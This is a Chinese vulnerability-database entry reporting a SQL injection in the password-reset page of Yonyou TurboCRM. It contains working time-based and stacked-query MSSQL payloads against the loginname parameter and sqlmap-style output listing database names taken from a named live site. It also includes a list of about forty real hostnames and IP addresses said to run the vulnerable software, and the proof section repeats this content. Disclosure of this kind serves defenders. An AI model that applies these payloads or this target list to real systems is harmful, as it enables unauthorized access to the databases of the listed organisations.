|用友某通用系统sql注入 - VULHUB开源网络安全威胁库

用友某通用系统sql注入

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：用友某通用系统注入 ### 详细说明：用友TurboCRM存在通用sql注入 [<img src="https://images.seebug.org/upload/201405/28191037676a2a737a000d6d5720f19e0181ee30.png" alt="1111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/28191037676a2a737a000d6d5720f19e0181ee30.png) ``` http://www.qinyuancrm.com/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds ``` loginname参数存在mssql timebased盲注 ``` Place: GET Parameter: loginname Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: orgcode=1&loginname=dsdfsfds'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: orgcode=1&loginname=dsdfsfds' WAITFOR DELAY '0:0:5'-- --- ``` ``` [*] master [*] model [*] msdb [*] tempdb [*] turbocrm60 [*] UFDATA_100_2012 [*] UFMeta_100 [*] UFSystem ``` 然后我去官方的crm去看了下，同样存在 [<img src="https://images.seebug.org/upload/201405/281915402608d7a895bc20b63363bbfcebd57581.png" alt="1111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/281915402608d7a895bc20b63363bbfcebd57581.png) ``` http://prm.ufida.com.cn/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds Place: GET Parameter: loginname Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: orgcode=1&loginname=dsdfsfds'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: orgcode=1&loginname=dsdfsfds' WAITFOR DELAY '0:0:5'-- --- web server operating system: Windows web application technology: PHP 5.2.10, Apache 2.2.13 back-end DBMS: Microsoft SQL Server 2008 ``` 我在百度搜索了下，整理出了以下使用这套crm的网站，title:用友TurboCRM ``` 218.94.82.23 prm.ufida.com.cn crm.landwind.com.cn crm.szclou.com http://yindajituan.gicp.net:8888 182.135.191.86 111.40.0.242:9091 222.171.32.36:9091 219.90.119.35:8081 180.168.98.94:8088 prm.yonyou.com www.kdlian.com:8001 prm.chanjet.com qinyuancrm.com kfdq369.gicp.net 220.113.5.194 218.84.134.162:8088 turbocrm.yofc.com crm.elfa.com.cn crm.pearmain.cn nc.shineroad.com crm.westernpower.cn crm7.abgroup.cn crm.transn.net zh4433.vicp.net 218.108.86.226 crm.yiwenkeji.com:8080 218.95.66.88:9036 crm.digisystem.com.cn:8080 crm.shineroad.com crm.siweidg.com 222.41.174.190:8088 117.36.76.254:8080 hq.longmanschools.com.cn:8080 59.50.33.86:9000 182.135.191.87 crm.szclou.com:8088 58.220.225.28:8080 ``` ### 漏洞证明： ``` http://www.qinyuancrm.com/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds ``` loginname参数存在mssql timebased盲注 ``` Place: GET Parameter: loginname Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: orgcode=1&loginname=dsdfsfds'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: orgcode=1&loginname=dsdfsfds' WAITFOR DELAY '0:0:5'-- --- ``` ``` [*] master [*] model [*] msdb [*] tempdb [*] turbocrm60 [*] UFDATA_100_2012 [*] UFMeta_100 [*] UFSystem ``` 然后我去官方的crm去看了下，同样存在 [<img src="https://images.seebug.org/upload/201405/281915402608d7a895bc20b63363bbfcebd57581.png" alt="1111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/281915402608d7a895bc20b63363bbfcebd57581.png) ``` http://prm.ufida.com.cn/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds Place: GET Parameter: loginname Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: orgcode=1&loginname=dsdfsfds'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: orgcode=1&loginname=dsdfsfds' WAITFOR DELAY '0:0:5'-- --- web server operating system: Windows web application technology: PHP 5.2.10, Apache 2.2.13 back-end DBMS: Microsoft SQL Server 2008 ```

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™